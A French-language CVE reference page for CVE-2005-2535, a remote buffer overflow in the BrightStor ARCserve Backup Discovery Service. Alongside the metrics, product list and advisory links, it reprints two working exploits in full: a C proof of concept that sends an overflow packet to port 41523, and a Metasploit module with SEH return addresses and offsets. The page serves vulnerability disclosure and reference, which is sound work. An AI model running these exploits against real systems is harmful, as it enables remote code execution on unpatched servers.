CVE-2005-2535 : Détail

CVE-2005-2535

85.29%V3
Network
2005-08-10
02h00 +00:00
2017-07-10
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in the Discovery Service in BrightStor ARCserve Backup 9.0 through 11.1 allows remote attackers to execute arbitrary commands via a large packet to TCP port 41523, a different vulnerability than CVE-2005-0260.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 815

Date de publication : 2005-02-11 23h00 +00:00
Auteur : cybertronic
EDB Vérifié : Yes

/* * BrightStor ARCserve Backup buffer overflow PoC * cybertronic@gmx.net * */ #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <netinet/in.h> #include <netdb.h> #define RED "\E[31m\E[1m" #define GREEN "\E[32m\E[1m" #define YELLOW "\E[33m\E[1m" #define BLUE "\E[34m\E[1m" #define NORMAL "\E[m" #define PORT 41523 void start ( int s ) { char buffer[4096]; bzero ( &buffer, 4096 ); memset ( buffer, 0x41, 50 ); buffer[0] = 0x9b; buffer[1] = 0x53; //S buffer[2] = 0x45; //E buffer[3] = 0x52; //R buffer[4] = 0x56; //V buffer[5] = 0x49; //I buffer[6] = 0x43; //C buffer[7] = 0x45; //E buffer[8] = 0x50; //P buffer[9] = 0x43; //C buffer[17] = 0x18; buffer[21] = 0xc0; buffer[22] = 0xa8; buffer[23] = 0x02; buffer[24] = 0x67; buffer[25] = 0x53; //S buffer[26] = 0x45; //E buffer[27] = 0x52; //R buffer[28] = 0x56; //V buffer[29] = 0x49; //I buffer[30] = 0x43; //C buffer[31] = 0x45; //E buffer[32] = 0x50; //P buffer[33] = 0x43; //C buffer[41] = 0x01; buffer[43] = 0x0c; buffer[44] = 0x6c; buffer[45] = 0x93; buffer[46] = 0xce; buffer[47] = 0x18; buffer[48] = 0x18; //ebp buffer[49] = 0xbe; buffer[50] = 0xba; buffer[51] = 0xad; buffer[52] = 0xde; //eip buffer[53] = 0xde; buffer[54] = 0xc0; buffer[55] = 0xad; buffer[56] = 0xde; printf ( "[*] Sending buffer [ %d bytes ]...", strlen ( buffer ) ); if ( write ( s, buffer, strlen ( buffer ) ) <= 0 ) { printf ( RED "Send failed!\n" NORMAL ); exit ( 1 ); } printf ( GREEN "OK!\n" NORMAL ); sleep ( 1 ); } int main ( int argc, char *argv[] ) { int s; struct hostent *he; struct sockaddr_in addr; if ( argc != 2 ) { fprintf ( stderr,"Usage: %s hostname\n", argv[0] ); exit ( 1 ); } printf ( "Resolving hostname..." ); if ( ( he = gethostbyname ( argv[1] ) ) == NULL ) { printf ( RED "FAILED!\n" NORMAL ); exit ( 1 ); } printf ( "OK!\n" ); if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 ) { exit ( 1 ); } addr.sin_family = AF_INET; addr.sin_port = htons ( PORT ); addr.sin_addr = *( ( struct in_addr * ) he->h_addr ); printf ( "Connecting to %s...", argv[1] ); if ( connect ( s, ( struct sockaddr * ) &addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( RED "FAILED!\n" NORMAL ); exit ( 1 ); } printf ( "OK!\n" ); start ( s ); close ( s ); return ( 0 ); } // milw0rm.com [2005-02-12]
Exploit Database EDB-ID : 16408

Date de publication : 2010-04-29 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: discovery_tcp.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'CA BrightStor Discovery Service TCP Overflow', 'Description' => %q{ This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a specific type of request is sent to the TCP listener on port 41523. This vulnerability was discovered by cybertronic[at]gmx.net and affects all known versions of the BrightStor product. This module is based on the 'cabrightstor_disco' exploit by Thor Doomen. }, 'Author' => [ 'hdm', 'patrick' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2005-2535'], [ 'OSVDB', '13814'], [ 'BID', '12536'], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'], [ 'URL', 'http://milw0rm.com/exploits/1131'], ], 'Privileged' => true, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets' => [ [ 'cheyprod.dll 9/14/2000', # Build 1220.0 9/14/2000 7.0.1220.0 { 'Platform' => 'win', 'Ret' => 0x23803b20, # pop/pop/ret 'Offset' => 1032, }, ], [ 'cheyprod.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x23805714, # pop/pop/ret 'Offset' => 1024, }, ], [ 'cheyprod.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x23805d10, # pop/pop/ret 'Offset' => 1024, }, ], ], 'DisclosureDate' => 'Feb 14 2005', 'DefaultTarget' => 1)) register_options( [ Opt::RPORT(41523) ], self.class) end def check # The first request should have no reply csock = Rex::Socket::Tcp.create( 'PeerHost' => datastore['RHOST'], 'PeerPort' => datastore['RPORT'], 'Context' => { 'Msf' => framework, 'MsfExploit' => self, }) csock.put('META') x = csock.get_once(-1, 3) csock.close # The second request should be replied with the host name csock = Rex::Socket::Tcp.create( 'PeerHost' => datastore['RHOST'], 'PeerPort' => datastore['RPORT'], 'Context' => { 'Msf' => framework, 'MsfExploit' => self, }) csock.put('hMETA') y = csock.get_once(-1, 3) csock.close if (y and not x) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit connect print_status("Trying target #{target.name}...") buf = rand_text_english(4096) # Overwriting the return address works well, but the only register # pointing back to our code is 'esp'. The following stub overwrites # the SEH frame instead, making things a bit easier. seh = generate_seh_payload(target.ret) buf[target['Offset'], seh.length] = seh # Make sure the return address is invalid to trigger SEH buf[ 900, 100] = (rand(127)+128).chr * 100 # SERVICEPC is the client host name actually =P (thanks Juliano!) req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41" req << buf sock.put(req) sock.get_once handler disconnect end end

Products Mentioned

Configuraton 0

Broadcom>>Arcserve_backup_2000 >> Version r16.5

Broadcom>>Brightstor_arcserve_backup >> Version 7.0

Broadcom>>Brightstor_arcserve_backup >> Version 9.0

Broadcom>>Brightstor_arcserve_backup >> Version 9.0

Broadcom>>Brightstor_arcserve_backup >> Version 9.0

Broadcom>>Brightstor_arcserve_backup >> Version 9.0.1

Broadcom>>Brightstor_arcserve_backup >> Version 11.0

Broadcom>>Brightstor_arcserve_backup >> Version 11.1

Broadcom>>Brightstor_arcserve_backup >> Version 11.1

Broadcom>>Brightstor_arcserve_backup >> Version 11.1

Broadcom>>Brightstor_arcserve_backup >> Version 11.1

Broadcom>>Brightstor_arcserve_backup >> Version 11.1

Broadcom>>Brightstor_arcserve_backup >> Version 11.1

Broadcom>>Brightstor_arcserve_backup >> Version 11.1

Broadcom>>Brightstor_arcserve_backup_hp >> Version 11.1

Broadcom>>Brightstor_enterprise_backup >> Version 10

Broadcom>>Brightstor_enterprise_backup >> Version 10.0

Broadcom>>Brightstor_enterprise_backup >> Version 10.0

Broadcom>>Brightstor_enterprise_backup >> Version 10.0

Broadcom>>Brightstor_enterprise_backup >> Version 10.0

Broadcom>>Brightstor_enterprise_backup >> Version 10.5

Broadcom>>Brightstor_enterprise_backup >> Version 10.5

Broadcom>>Brightstor_enterprise_backup >> Version 10.5

Broadcom>>Brightstor_enterprise_backup >> Version 10.5

Broadcom>>Brightstor_enterprise_backup >> Version 10.5

Broadcom>>Brightstor_enterprise_backup >> Version 10.5

Références

http://www.kb.cert.org/vuls/id/966880
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/12536
Tags : vdb-entry, x_refsource_BID
http://www.osvdb.org/13814
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/14293
Tags : third-party-advisory, x_refsource_SECUNIA